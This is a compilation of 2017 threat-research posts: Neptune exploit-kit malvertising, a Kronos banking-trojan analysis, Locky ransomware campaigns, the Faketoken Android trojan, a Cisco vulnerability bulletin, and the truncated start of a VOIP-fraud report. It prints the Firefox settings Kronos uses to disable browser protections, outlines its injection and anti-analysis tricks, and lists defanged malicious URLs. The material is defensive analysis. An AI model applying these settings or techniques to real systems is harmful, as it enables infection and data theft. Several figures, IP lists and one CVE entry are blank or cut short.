Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit

Exploit kit (EK) activity has been on the decline ever since Angler
Exploit Kit was shut down
in 2016. Fewer
people using Internet Explorer
and a drop
in browser support for Adobe Flash
– two primary targets of many
exploit kits – have also contributed to this decline. Additionally,
some popular redirect campaigns using PseudoDarkleech
and EITest Gate to Rig Exploit Kit
were shut down in first half
of this year.

Despite all this, malvertising
campaigns involving exploits kits
remain active. The Neptune
Exploit Kit (or Terror EK), which initially started as a Sundown EK
copycat operation, has relied heavily on malvertisements. Early use of
this exploit kit saw domains with very similar patterns dropping
cryptocurrency miners through malvertisements:

  • networkmarketingpro3[.]us
  • networkmarketingpro2[.]us
  • onlinesalesproaffiliate1[.]us
  • onlinesalesproaffiliate2[.]us
  • onlinesalesproaffiliate3[.]us
  • onlinesalesproaffiliate4[.]us
  • onlinesalesproaffiliate5[.]us
  • onlinesalesproaffiliate6[.]us

Payloads spread by Neptune Exploit Kit have since diversified.
Recently, we have seen changes in Neptune EK’s URI patterns, landing
pages, malvertisement campaigns and login account details associated
with the cryptocurrency mining payloads.


Since July 16, our Dynamic Threat Intelligence (DTI) has observed
changes in URI patterns for Neptune Exploit Kit. At the time of
writing, the new campaign abuses a legitimate popup ad service (within
Alexa’s top 100) with redirects to ads about hiking clubs, as shown in
Figure 1.

Figure 1: Fake ad for a hiking club
leading to Neptune EK

Redirects from domains associated with these ads eventually use 302
redirects to move victims to exploit kit landing pages. Fake domains
involved in these redirects imitate real domains. For example,
highspirittreks[.]club shown in Figure 1 spoofs highspirittreks[.]com.
Other hiking fake ads use similarly spoofed legitimate site names with
.club domains. Figure 2 shows a redirect from a fake site’s pop-up.

Figure 2: Silent redirect to EK landing page

FireEye Dynamic Threat Intelligence (DTI) stats show the regions
being affected by this campaign (Figure 3).

Figure 3: Regions affected by the
malvertisement campaign, as observed from customer data

A few instances of the redirect involve flvto[.]download (mimicking
the legitimate www.flvto[.]biz) instead of hiking club fake ads.
Figure 4 and Figure 5 show the legitimate domain and fake domain,
respectively, for comparison’s sake.

Figure 4: Real page, flvto[.]biz (Alexa
rank 2,674)

Figure 5: Fake page, flvto[.]download

Most of the ads linked to this campaign have been observed on
high-traffic torrent and multimedia hosting sites.

Sites are hosted on IP Reverse lookup for this
IP shows:

  • 2watchmygf[.]stream
  • flvto[.]download
  • highspirittreks[.]club
  • treknepal[.]club

Other hosted IPs and domains of the same campaign are in the
Indicators of Compromise section at the end of the post. All IPs point
to locations in Amsterdam.

Since July 16, related EK infrastructure has been hosted on domains
protected by Whois Guard. However, in recent activity, domains are
linked to the Registrant email: ‘gabendollar399@gmx[.]com’.

The following domains are currently associated with this email:

Domain Name Create Date Registrar
itsmebecauseyoua[.]pw 2017-03-05
loansforevery[.]us 2017-04-14 1 HOST RUSSIA, INC
managetheworld[.]us 2017-04-14 1 HOST RUSSIA, INC
nudecams[.]us 2017-04-14 1 HOST RUSSIA, INC

Exploits/Landing Page

The landing page for the Neptune Exploit Kit redirects to further
HTML and Adobe Flash exploit links after it checks the Flash versions
installed on the victim’s machine (see Figure 6).

Figure 6: Landing page of Neptune EK

This EK exploits multiple vulnerabilities in one run. Most of these
exploits are well-known and commonly seen in other exploit kits.

Currently, Neptune EK uses three Internet Explorer exploits and two
Flash exploits:

Payload (Monero miner)

The payload is dropped as a plain executable from one of the URI’s
belonging to the EK domain (same as the landing page). Figure 7 shows
a typical response header for these cases.

Figure 7: Response header for Monero
miner payload

Post infection traffic shows an attempt to connect to
minergate[.]com (Figure 8) and a login attempt using the cpu-miner
service via the login email monsterkill20@mail[.]com (Figure 9). Login
attempts are invoked via the command line:

Figure 8: DNS query to minergate[.]com

Figure 9: Login attempt


Despite an observable decline in exploit kit activity, users are
still at risk, especially if they have outdated or unpatched software.
This threat is especially dangerous considering drive-by exploit kits
(such as Neptune EK) can use malvertisements to seamlessly download
payloads without ever alerting of the user.

FireEye NX detects
exploit kit infection attempts
before the malware payload is
downloaded to the user’s machine. Additionally, malware payloads
dropped by exploit kits are detected in all other FireEye products.

Indicators of Compromise

Malvertisement domains:
  • hxxp://treknepal[.]club/
  • hxxp://highspirittrecks[.]club
  • hxxp://advnepaltrekking[.]club
  • hxxp://nepalyogatrek[.]club
  • hxxp://flvto[.]download
Malvertisement IPs:
EK domains (current active) registrant:

Domain ID: D59392852-US
Sponsoring Registrar: NAMECHEAP, INC.
Sponsoring Registrar IANA ID: 1068
Registrar URL (registration services):
Domain Status:
Registrant ID: NLGUS4BVD3M2DN2Y
Registrant Name: kreb son
Registrant Address1: Maker 541
Registrant City: Navada
Registrant State/Province: SA
Registrant Postal Code: 546451
Registrant Country:
Registrant Country Code: BG
Registrant Phone Number: +44.45623417852
Registrant Email:
Registrant Application Purpose:
Registrant Nexus Category: C11
Administrative Contact ID: VNM50NNJ5Y0VNLDY
Administrative Contact Name: kreb son
Administrative Contact Address1: Maker 541
Administrative Contact City: Navada
Administrative Contact State/Province: SA
Administrative Contact Postal Code: 546451
Administrative Contact Country: Bulgaria
Administrative Contact Country Code: BG
Administrative Contact Phone Number: +44.45623417852
Administrative Contact Email: gabendollar399@gmx[.]com

Sample EK URI Pattern:


Sample MD5s:



We would like to thanks Hassan Faizan for his contributions to this discovery.

Go to Source
Author: Zain Gardezi

Inside the Kronos malware – part 1

Recently, a researcher nicknamed MalwareTech famous from stopping the WannaCry ransomware, got arrested for his alleged contribution into creating the Kronos banking malware. We are still not having a clear picture whether the allegations are true or not – but let’s have a look at Kronos itself.


This malware has been first advertised on the black market since around July 2014, by an individual nicknamed VinnyK, writing in Russian:

Source: https://twitter.com/x0rz/status/893191612662153216

The full text of the advertisement, translated to English, has been included in the IBM’s Security Intelligence article.

We found Kronos being spread by various exploit kits, i.e. Sundown (more information here). The malware is being distributed up to now – some of the recent samples has been captured about a month ago, dropped from Rig EK.

Nowadays, Kronos is often used for the purpose of downloading other malware. One of the campaigns using Kronos as a downloader was described by Proofpoint.

Analyzed samples

Samples from 2014:

Sample #1 (from 2016)

Sample #2 (from 2017):

Behavioral analysis

After being run, Kronos installs itself in a new folder (%APPDATA%/Microsoft/[machine-specific GUID]):

The dropped sample has a hidden attribute.

Persistence is achieved with the help of a simple Run key:

At the beginning of the execution, the malware modifies the Firefox profile, overwriting user.js with the following content:

user_pref("network.cookie.cookieBehavior", 0);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_submit_insecure", false);
user_pref("security.warn_submit_insecure.show_once", false);
user_pref("app.update.auto", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.allow-push", false);
user_pref("network.http.spdy.coalesce-hostnames", false);
user_pref("network.http.spdy.enabled.deps", false);
user_pref("network.http.spdy.enabled.http2", false);
user_pref("network.http.spdy.enabled.http2draft", false);
user_pref("network.http.spdy.enforce-tls-profile", false);
user_pref("security.csp.enable", false);

The new settings are supposed to give to the malware more control over the browser’s behavior and downgrade the security settings. Then, the malware injects itself into svchost, and continues running from there. We can find it listening on local sockets.

It is worth noting, that Kronos deploys a simple userland rootkit, that hides the infected process from the monitoring tools. So, the process running the main module may not be visible. The rootkit is, however, not implemented in a very reliable way, and the effect of hiding does not always work.

Whenever some browser is deployed. Kronos injects its module there and connects with the main module, that runs inside the svchost process. Looking at the TCP connections established by the particular processes (i.e. using ProcessExplorer), we can see that a browser is paired with the infected svchost:

This trick is often used by banking trojans for the purpose of stealing data from the browser. The module injected in the browser hooks the used API and steals the data. After that, it sends this data to the main module that process it further, and reports to the CnC.

Network communication

The analyzed sample was connecting to CnCs at two addresses:


At the time of analysis, each CnC was dead (sinkholed), but still we could spot some patterns typical for this malware family.

First, the malware sends a beacon that is 74 bytes long:

Then, follows another chunk of data:

In both cases we can see that the requests are obfuscated by XOR with random character. This is how the beacon looks after being XOR-decoded:

We can see that all the requests start from the same header, including the GUID specific to the infected machine.

Detailed research about decrypting Kronos communication has been already described here.


Interesting strings

Like most malware, Kronos is distributed packed by various packers/crypters. After unpacking the first layer, we get the malicious payload. We can easily identify Kronos by the typical strings used:

There are more strings that are typical for this particular malware:

Those strings are hashes used to dynamically load particular imported functions. Malware authors use this method to obfuscate used API functions, and by this way, hide the real mission of their tool. Instead of loading function using its explicit name, they enumerate all imports in a particular DLL, calculate hashes of their names, and if the hash matches the hardcoded one, they load that function.

Although the approach is common, the implementation seen in Kronos is not typical. Most malware stores hashes in the form of DWORDs, while Kronos stores them as strings.

Inside the early samples of Kronos, we can find a path to the debug symbols, revealing the structure of directories on the machine where the code was built. The following path was extracted from one of the Kronos samples observed in wild (01901882c4c01625fd2eeecdd7e6745a):


The PDB path can be also found in the DLL (6c64c708ebe14c9675813bf38bc071cf) that belongs to the release of Kronos from 2014:


This module, injlib-client.dll, is the part injected into browsers. In the newer version of Kronos, analogical DLL can be found, however, the PDB path is removed.

Injection into svchost

The main module of Kronos injects itself into svchost (version from 2014 injects into explorer instead). In order to achieve this initial injection, the malware uses a known technique, involving the following steps:

  1. creates the svchost process as suspended
  2. maps its sections into its own address space
  3. modifies the sections, adding its own code and patching the entry point in order to redirect the execution there
  4. resumes the suspended process, letting the injected code execute

Below, you can see the memory inside the infected svchost (in early versions, the injection was targeting explorer). The malware is added in a new, virtual section – in the given example, mapped as 0x70000:

This is how the patched entry point of svchost looks like – as we can see, execution is redirected to the address that lies inside the added section (injected malware):

The execution of the injected PE file starts in a different function now – at RVA 0x11AB0:

– while the original Entry Point of the malware was at RVA 0x12F22:

The malware defends itself from the analysis, and in case of the VM or debugger being detected, sample will crash soon after the injection.

Running sample from new Entry Point

The main operations of the malware starts inside the injected module. This is how the new Entry Point looks like:

The main function is responsible for loading all the imports, and then deploying the malicious actions.

If you are an analyst trying to run Kronos from that point of the execution, below you will find some tips.

The first block of the function is responsible for filling the import table of the injected module. If we want to run the sample from that point, rather then following it when it is injected, there are some important things to notice. First of all, the loader is supposed to fill some variables inside the injected executable, i.e. the variable module_base. Other functions will refer to this, so, if it does not contain the valid value, the sample will crash. Also, the functions filling the imports expects that the section .rdata (containing the thunks to be filled), is set as writable. It will be set as writable in case when the sample is injected, because then, the full PE is mapped in a memory region with RWX (read-write-execute) access rights. However, in the normal case – when the sample is run from the disk – it is not. That’s why, in order to pass this stage, we need to change the access rights to the section manually.

Another option is to run Kronos sample starting from the next block of the main function. This is also leads to successful execution, because in case if the sample is run from the disk rather than injected, imports are filled by windows loader and doing it manually is just redundant.

The last issue to bypass are the defensive check, described below.

Defensive tricks

The malware deploys defense by making several environment checks. The checks are pretty standard – searching blacklisted processes, modules etc. The particular series of checks are called from inside one function, and results are stored as flags set in a dedicated variable:

If the debugger/VM is detected, the variable has a non-zero value. Further, the positive result of this check is used to make the malware crash, interrupting the analysis.

The crash is implemented by taking an execution path inappropriate to the architecture where the sample was deployed. The malware is a 32 bit PE file, but it have a bit different execution paths, depending if it is deployed on 32 or 64 bit system. First, the malware fingerprints the system and sets the flag indicating the architecture:

DWORD is_system64_bit()
	DWORD flag = 0;
	__asm {
		xor eax, eax
		mov ax, cs
		shr eax, 5
		mov flag, eax
	return flag;

This trick uses observations about typical values of CS registry on different versions of Windows (more information here). It is worth to note, that it covers most but not all the cases, and due to this on some versions of Windows the malware may not run properly.
If the debugger/VM is detected, the flag indicating the architecture is being flipped:

That’s why, the sample crashes on the next occasion when the architecture-specific path of execution should be taken.

For example, if the sample is deployed on 64 bit machine, under Wow64, the syscall can be performed by using the address pointed by FS:[0xC]. But if the malware runs on a 32 bit machine, the value pointed by FS:[0xC] will be NULL, thus, calling it crashes the sample.

This way of interrupting analysis is smart – sample does not exit immediately after the VM/debugger is detected, and it makes it harder to find out what was the reason of the crash.

Using raw syscalls

As mentioned in the previous paragraph, Kronos uses raw syscalls. Syscall basically means an interface that allows to call some function implemented by kernel from the user mode. Applications usually use them via API exported by system DLLs (detailed explanation you can find i.e. on EvilSocket’s blog).

Those API calls can be easily tapped by monitoring tools. That’s why, some malware, for the sake of being stealthier reads the syscalls numbers from the appropriate DLLs, and calls them by it’s own code, without using the DLL as a proxy. This trick has been used i.e. by Floki bot.

Let’s have a look how is it implemented in Kronos. First, it fetches appropriate numbers of the syscalls from the system DLLs. As mentioned before, functions are identified by hashes of their names (full mapping hash-to-function you can find in Lexsi report).

For example:

B6F6X4A8R5D3A7C6 -> NtQuerySystemInformation

The numbers of syscalls are stored in variables, xored with a constant. Fragment of the code responsible for extracting raw syscalls from the DLL:

In order to use them further, for every used syscall Kronos implements it’s own wrapper function with appropriate number of parameters. You can see an example below:

The EAX registry contains the number of the syscall. In the given example, it represents the following function:

00000105 -> NtQuerySystemInformation

Kronos uses raw syscalls to call the functions that are related to injections to other processes, because they usually trigger alerts. Functions that are called by this way are listed below:


It matches the black market advertisement, stating: “The Trojan uses an undetected injection method” (source).

Rootkit and the hooking engine

One of the features that malware provides is a userland rootkit. Kronos hooks API of the processes, so that they will not be able to notice its presence. The hooking is done by a specially crafted block of the shellcode, that is implanted in each accessible running process.

First, Kronos prepares the block of shellcode to be implanted. It fills all the neccessery data: addresses of functions that are going to be used, and the data specific to the malware installation, that are intended to be hidden.

Then, it searches through the running processes and tries to make injection wherever it is possible. Interestingly, explorer.exe and chrome.exe are ommitted:

The shellcode is deployed in a new thread within the infected process:

Below you can see the shellocode inside the memory of the infected process:

When it runs, it hooks the following functions in the address space of the infected process:


The interesting thing about this part of Kronos is its similarity with a hooking engine described by MalwareTech on his blog in January 2015. Later, he complained in his tweet, that cybercriminals stolen and adopted his code. Looking at the hooking engine of Kronos we can see a big overlap, that made us suspect that this part of Kronos could be indeed based on his ideas. However, it turned out that this technique was described much earlier (i.e. here, //thanks to  @xorsthings for the link ), and both authors learned it from other sources rather than inventing it.

Let’s have a look at the technique itself. During hooking, one may experience concurrency issues. If a half-overwritten function will start to be used by another thread, the application will crash. To avoid this, it is best to install a hook by a single assembly instruction. MalwareTech described a idea of utilizing for this purpose an instruction lock cmpxch8b. The same trick and similar implementation can be found in Kronos.

The hooking function used by Kronos takes two parameters – the address of function to be hooked, and the address of function used as a proxy. This is the fragment of the implanted shellcode where the hooking function is being called:

First, the hooking function searches the suitable place in the code of the attacked function, where the hook can be installed:

The above code is an equivalent of the following:


Then, it installs the hook:

As we can see, the used method of  installing hook is almost identical to:


Below you can see an example of Kronos hooking a function ZwResumeThread in the memory of the attacked process. Instruction lock cmxch8b is indeed used to overwrite the function’s beginning:

After the hook installation, whenever the infected process calls the hooked function, the execution is redirected to the proxy code inside the malicious module:

The hooking engine used in Kronos is overall more sophisticated. First of all, even the fact that it is a shellcode not a PE file makes a difficulty level of implementing it higher. The author must have taken care of filling all the functions addresses by his own. But also, the author of Kronos shown some more experience in predicting possible real-life scenarios. For example he took additional care for checking if the code was not already hooked (i.e. by other trojans or monitoring tools):

Attacking browsers

The malware injects into a browser an additional module (injlib-client.dll). Below we can see an example of the DLL injected into Firefox address space:

The malware starts the injected module with the help of the injected shellcode:

We an see some API redirections added by the malware. Some of the functions imported by the attacked browser are hooked, so that all the data that passes through them is tapped by the Kronos module.

The data that is being grabbed using the hooked browser API is then sent to the main module, that is coordinating malware’s work and reporting to the CnC server.


An overall look at the tricks used by Kronos shows that the author has a prior knowledge in implementing malware solutions. The code is well obfuscated, and also uses various tricks that requires understanding of some low-level workings of the operating system. The author not only used interesting tricks, but used them in a logical and fitting way. The level of precision lead us to the hypothesis, that Kronos is the work of a mature developer, rather than an experimenting youngster.


https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en – “Overview of the Kronos banking malware rootkit” by Lexsi

https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en – Decrypting the configuration

The post Inside the Kronos malware – part 1 appeared first on Malwarebytes Labs.

Go to Source
Author: hasherezade

Security Alert: Locky Adds the .lukitus Extension, Spreads through Waves of Malspam

After infecting computers with recurring malicious email campaigns sent to random recipients in organizations from all over the world, Locky ransomware strikes again.

Locky’s persistence is already famous, as cyber criminals use it frequently to exploit vulnerabilities in outdated systems. The most recent campaign, which started late last night, uses a new extension called .lukitus and has been discovered by Rommel Joven. As expected, Internet users can get their files back, after paying a ransom required by attackers.

The malicious email arrives into users’ inboxes with the following subject lines:

< No Subject > or Emailing – CSI- [0-9] * _ MB_S_ [A-z0-9]

The email also includes zip or rar attachments with JS files. When these files are executed, they will download the payload from various malicious URLs, like the ones in the selection below (sanitized for your online safety):

http: // angel demon [.] com / jbYUF6D

http: // Antibody Services [.] net / jbYUF6D

http: // ttytreffdrorseder [.] net / of / jbYUF6D

http: // asliozturk [.] com / jbYUF6D

http: // antwerpiastamps [.] BE / jbYUF6D

This is another variation of the same attack, spotted yesterday as well:

Source: Bleeping Computer

To ensure that Locky can communicate with its underlying C&C servers unhindered, a DGA (Domain Generation Algorithm) is also used, which provides the following domains and many, many more (sanitized for your online safety):

http: // sorqjivpyfrwlo [.] Click / imageload.cgi

http: // dxeqiniexovy [.] org / imageload.cgi

http: // kokalgfsnepogq [.] ru / imageload.cgi

http: // kljidoejmiqx [.] org / imageload.cgi

http: // jcanepkjyu [.] biz / imageload.cgi

Once the files are downloaded and executed, they start scanning the user’s computer and encrypting system files, modifying their names with the following format:


After the encryption is done, Locky removes the downloaded executable, and shows a ransom note – having these names: lukitus.htm and lukitus.bmp  on users’ display on how they can pay it and get their files back.

This is how a message with the Locky Lukitus Ransom Note appears on an infected computer display:

ransom note message

Source: Bleeping Computer

Although there are a sum of decryption tools out there to unlock your data for free, this Locky Ransomware Lokitus variant remains still unbreakable with no possibility to decrypt .lukitus files for free.

Initially, VirusTotal showed that 7 of 53 antivirus solutions were detecting this malicious file at the time it was posted. After a new and recent analysis, more engines (20 of 53 antivirus products) also identify this threat.

Source: VirusTotal

Here’s what you can do to protect from this new ransomware attack:

  • Backup, backup and backup again! Make sure you have at least 2 backups of your important data on external sources such as a hard drive or somewhere located in the cloud (Google Drive, Dropbox, etc.). This guide shows how to do it.
  • Update, update and update again! Once again, we remind users to install all the latest updates for their apps installed on the device, including the operating system.
  •  Do not open, download email (messages) or click on suspicious links received from unknown sources that could infect your device.
  • Make sure you have a security software product (antivirus) that is updated or use a  proactive security product to block access to infected domains or servers.

Ransomware attacks are on the rise and continue to appear in different forms. Once again, we remind you about the importance of being proactive and taking all needed security measures to protect your sensitive data.

*This article features cyber intelligence provided by CSIS Security Group researchers.

Go to Source
Author: Ioana Rijnetu

Taxi Trojans are on the way

You’re in a hurry, trying to get to work, a business meeting, a date. So you launch your favorite app for booking a taxi as usual, but this time, it prompts you to enter your credit card number. Does that seem suspicious? It may not — apps forget information, and all you have to do is add your card number again.

However, after some time you notice money disappearing from your account. What happened? You may be the unlucky winner of a mobile Trojan. This kind of malware has been caught recently stealing bank data by impersonating the interfaces of taxi-booking apps.

The Faketoken Trojan has existed for a long time, and it has been upgraded for many years. Our experts named the current version “Faketoken.q,” and by now it has learned a significant number of tricks.

After getting onto a smartphone (judging by the malware icon, Faketoken infiltrates smartphones through bulk SMS messages with a prompt to download some picture) and installing the necessary modules, the Trojan hides its shortcut icon and starts background monitoring of everything that happens in the system.

The icon of the installed Faketoken Trojan

First, the Trojan is interested in the user’s calls. As soon as it detects a call, it starts recording. When the call is finished, Faketoken sends the recording to the criminal’s server. Second, the Trojan also checks which apps the smartphone’s owner uses.

When Faketoken detects the launch of an app whose interface it can simulate, the Trojan immediately overlays the app with its own screen. To achieve that, it uses a standard Android feature that supports showing screen overlays on top of all other apps. A whole bunch of legitimate apps, such as messengers, window managers, and so on, use this feature.

The overlaying window matches the colors of the original app’s interface. In this window, the Trojan prompts the user to enter the number of his or her credit card, including the verification code from the back of the card.

The Faketoken.q Trojan impersonates taxi-booking apps popular in Russia

Actually, Faketoken.q is after a huge variety of apps that have one thing in common: in them, a request to enter payment data looks normal enough not to arouse suspicion. Among the attacked apps are a number of mobile banking apps, Android Pay, the Google Play Store, apps for booking flights and hotel rooms, and apps for paying traffic tickets — as well as apps for booking taxis.

During the very stage of stealing money from the user, Faketoken resorts to another ruse, intercepting all incoming SMS messages, hiding them from the user, and forwarding them to the criminals’ server, where one-time passwords for payment confirmation from those messages are extracted.

How banking Trojans bypass two-factor authentication

Judging by the small number of attacks that we have registered and the UI artifacts, which you can see in one of the screenshots above, we’d say the researchers at our antivirus laboratory got their hands on one of the test versions of the Trojan, not the final one.

We must give the assiduous creators of Faketoken their due. They will most likely improve the Trojan, and a wave of infection incidents may sprout from the “commercial” version at some point.

Currently the Trojan is focused on users in Russia, but as we’ve seen many times in the past, cybercriminals constantly steal ideas from each other, so it won’t take long for them to adopt the same trick in other countries. A lot of city dwellers have taxi-booking apps installed these days, so this trick represents a good opportunity for malware creators.

Below you can find several pieces of advice on how to protect yourself against Faketoken and similar mobile Trojans that steal card numbers and intercept SMS messages with one-time passwords used to confirm payments.

  • It is imperative that you go into Android’s settings and prohibit the installation of apps from unknown sources. To block installation from unknown sources, go to Settings -> Security and uncheck Unknown sources.

  • Always pay attention to what access permissions an app requests during installation, even if you downloaded it from Google Play (there might be Trojans in the official app store as well). You can learn more about Android permissions in this article.

Go to Source
Author: Alex Drozhzhin

New CISCO Security Bulletin

CISCO Security Bulletin 20170817-1200

CISCO Security Bulletin


CVE-2017-6790: Cisco TelePresence Video Communication Server Denial of Service Vulnerability
  • The vulnerability is due to excessive SIP traffic sent to the device. An attacker could exploit this vulnerability by transmitting large volumes of SIP traffic to the VCS. An exploit could allow the attacker to cause a complete DoS condition on the targeted system.
  • CSCve32897


CVE-2017-6785: Cisco Unified Communications Manager Horizontal Privilege Escalation
  • The vulnerability is due to lack of proper Role Based Access Control (RBAC) when certain user configuration changes are requested. An attacker could exploit this vulnerability by sending an authenticated, crafted HTTP request to the targeted application. An exploit could allow the attacker to impact the integrity of the application where one user can modify the configuration of another user’s information.
  • CSCve27331


CVE-2017-6767: Cisco Application Policy Infrastructure Controller Privilege Escalation Vulnerability
  • The vulnerability is due to a limitation with how Role-Based Access Control (RBAC) grants privileges to remotely authenticated users when login occurs via SSH directly to the local management interface of the APIC. An attacker could exploit this vulnerability by authenticating to the targeted device. The attacker’s privilege level will be modified to match that of the last user to log in via SSH. An exploit could allow the attacker to gain elevated privileges and perform CLI commands that should be restricted by the attacker’s configured role.
  • CSCvc34335


CVE-2017-6768: Cisco Application Policy Infrastructure Controller Custom Binary Privilege Escalation Vulnerability
  • The vulnerability is due to a custom executable system file that was built to use relative search paths for libraries without properly validating the library to be loaded. An attacker could exploit this vulnerability by authenticating to the device and loading a malicious library that can escalate the privilege level. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device. The attacker must have valid user credentials to log in to the device.
  • CSCvc96087


CVE-2017-6710: Cisco Virtual Network Function Element Manager Arbitrary Command Execution Vulnerability
  • The vulnerability is due to command settings that allow Cisco VNF Element Manager users to specify arbitrary commands that will run as root on the server. An attacker could use this setting to elevate privileges and run commands in the context of the root user on the server.
  • CSCvc76670


CVE-2017-6771: Cisco Ultra Services Framework AutoVNF Configuration Information Disclosure Vulnerability
  • The vulnerability is due to insufficient protection of sensitive data. An attacker could exploit this vulnerability by browsing to a specific URL of an affected device. An exploit could allow the attacker to view sensitive configuration information about the deployment.
  • CSCvd29358


CVE-2017-6772: Cisco Elastic Services Controller (ESC) Configuration Files Information Disclosure Vulnerability
  • The vulnerability is due to insufficient protection of sensitive data. An attacker could exploit this vulnerability by authenticating to the application and navigating to certain configuration files. An exploit could allow the attacker to view sensitive system configuration files.
  • CSCvd29408


CVE-2017-6773: Cisco StarOS for ASR 5000 Series Routers Command Line Interface Security Bypass Vulnerability
  • The vulnerability is due to insufficient input sanitization of user-supplied input at the CLI. An attacker could exploit this vulnerability by crafting a script on the device that will allow them to bypass built-in restrictions. An exploit could allow the unauthorized user to launch the CLI directly from a command shell.
  • CSCvd47722


CVE-2017-6774: Series Routers FTP Configuration File Modification Vulnerability
  • The vulnerability is due to the inclusion of sensitive system files within specific FTP subdirectories. An attacker could exploit this vulnerability by overwriting sensitive configuration files through FTP. An exploit could allow the attacker to overwrite configuration files on an affected system.
  • CSCvd47739


CVE-2017-6775: Cisco StarOS for ASR 5000 Series Routers Privilege Escalation Vulnerability
  • The vulnerability is due to incorrect permissions that are given to a set of users. An attacker could exploit this vulnerability by logging in to the shell of an affected device and elevating their privileges by modifying environment variables. An exploit could allow the attacker to gain admin-level privileges and take control of the affected device.
  • CSCvd47741


CVE-2017-6776: Cisco Elastic Services Controller (ESC) Cross-Site Scripting Vulnerability
  • The vulnerability is due to insufficient validation of user-supplied input by the affected software. An attacker could exploit this vulnerability by convincing a user to access a malicious link or by intercepting a user request and injecting malicious code into the request. An exploit could allow the attacker to execute arbitrary script code in the context of the affected site or allow the attacker to access sensitive browser-based information.
  • CSCvd76324


CVE-2017-6777: Cisco Elastic Services Controller (ESC) Configuration Parameters Information Disclosure Vulnerability
  • The vulnerability is due to insufficient protection of sensitive files on the system. An attacker could exploit this vulnerability by logging into the ConfD server and executing certain commands. An exploit could allow an unprivileged user to view configuration parameters that can be maliciously used.
  • CSCvd76409


CVE-2017-6778: Cisco Ultra Services Platform Deployment Configuration Information Disclosure Vulnerability
  • The vulnerability is due to the transmission of sensitive information as part of a GET request. An attacker could exploit this vulnerability by sending a GET request to a vulnerable device. An exploit could allow the attacker to view information regarding the Ultra Services Platform deployment.
  • CSCvd76406


CVE-2017-6781: Cisco Policy Suite Privilege Escalation Vulnerability
  • To exploit this vulnerability, the attacker must log in to the appliance with valid credentials.
  • CSCve37724


CVE-2017-6783: Cisco Security Appliances SNMP Polling Information Disclosure Vulnerability
  • The vulnerability occurs because the appliances do not protect confidential information at rest in response to Simple Network Management Protocol (SNMP) poll requests. An attacker could exploit this vulnerability by doing a crafted SNMP poll request to the targeted security appliance. An exploit could allow the attacker to discover confidential information that should be restricted, and the attacker could use this information to conduct additional reconnaissance. The attacker must know the configured SNMP community string to exploit this vulnerability.
  • CSCve26106,CSCve26224,CSCve26202


CVE-2017-6784: Cisco RV34x Router Information Disclosure Vulnerability
  • The vulnerability is due to Cisco WebEx Meetings not sufficiently protecting sensitive data when responding to an HTTP request to the web interface. An attacker could exploit the vulnerability by attempting to use the HTTP protocol and looking at the data in the HTTP responses from the Cisco WebEx Meetings Server. An exploit could allow the attacker to find sensitive information about the application.
  • CSCve37988


CVE-2017-6782: lity
  • .
  • CSCve47074


CVE-2017-6786: Cisco Elastic Services Controller Sensitive Log Information Disclosure Vulnerability
  • The vulnerability is due to improper protection of sensitive log files. An attacker could exploit this vulnerability by logging in to an affected system and accessing unprotected log files. A successful exploit could allow the attacker to access sensitive log files, which may include system credentials, on the affected system.
  • CSCvc76616


CVE-2017-6788: Cisco AnyConnect WebLaunch Cross-Site Scripting Vulnerability
  • The vulnerability is due to insufficient input validation of some parameters that are passed to the WebLaunch function of the affected software. An attacker could exploit this vulnerability by convincing a user to access a malicious link or by intercepting a user request and injecting malicious code into the request.
  • CSCvf12055


Locky ransomware returns to the game with two new flavors

We recently observed a fresh malicious spam campaign pushed through the Necurs botnet distributing so far, two new variants of Locky ransomware.

In our last Q2 2017 report on tactics and techniques, we mentioned that Locky ransomware had reappeared with a new extension, but went dark again for months.

From August 9th, Locky made another reappearance using a new file extension “.diablo6” to encrypt files with the rescue note: “diablo6-[random].htm“.

Today a new Locky malspam campaign is pushing a new Locky variant that adds the extension “.Lukitus” and the rescue note: “lukitus.html“.

Locky, like numerous other ransomware variants, is usually distributed with the help of spam emails containing a malicious Microsoft Office file or a ZIP attachment containing a malicious script.

Locky variants, callback to a different command and control server (C2) and use the affiliate id: AffilID3 and AffilID5.

Over the last few months, Locky has drastically decreased its distribution, even failed to be distributed at all, then popped back up again, vanished and reappeared once more.

The ups and downs of Locky remain shrouded in mystery. One thing time has taught us is that we should never assume Locky is gone simply because it’s not active at a particular given time.

Locky extension history

Active Campaigns:

  • Aug-09: MalSpam attached .zip with .vbs malware.
     VBS: 4c1975295603dbb3994627a499416b71
     Payload: 0d0823d9a5d000b80e27090754f59ee5
  • Aug-11: MalSpam attached PDF with embedded .DOCM files.
     PDF: 84fd7ba91a587cbf8e20d0f2d5fda285
     DOC: 97414e16331df438b2d7da0dad75a8d5
     Payload: 9dcdfbb3e8e4020e4cf2fc77e86daa76
  • Aug-14: MalSpam attached RAR with .JS malware.
     JS: badea58f10d5d2bb242962e3c47ff472
     Exe: 6b4221adf0ecb55cd1a4810330b4e1e4
  • Aug-15: MalSpam attached ZIP with .JS malware.
     JS: 5f1af4f2702a6bc7f5250c9879487f66
     Exe: 89ed8780cae257293f610817d6bf1a2e
  • Aug-16: MalSpam attached ZIP with .JS malware.
     JS: f2c97bd1793ff93073bfde61d12f482b
     Exe: 4baa57a08c90b78d16c634c22385a748


Malwarebytes protects against this attack at various layers including macro and ransomware mitigation, and neither of those required any signature update.

Click to view slideshow.

The post Locky ransomware returns to the game with two new flavors appeared first on Malwarebytes Labs.

Go to Source
Author: Marcelo Rivero

VOIP Services Utilized for Fraud Proliferate Across Russian-Language Underground

One barrier to online fraud is that some transactions require a phone call – either made or received – for confirmation. While this measure has long presented a significant hurdle to criminals attempting to make online purchases using compromised bank or online retail accounts, it appears to be becoming less and less effective as a security measure. Indeed, some criminals have recently demonstrated their ability to bypass this type of telephone verification to make fraudulent online transactions by leveraging various Voice over Internet Protocol (VOIP) services.

Flashpoint has recently observed three VOIP services in particular that have been gaining traction among Russian-speaking cybercriminals seeking to make fraudulent online transactions:     


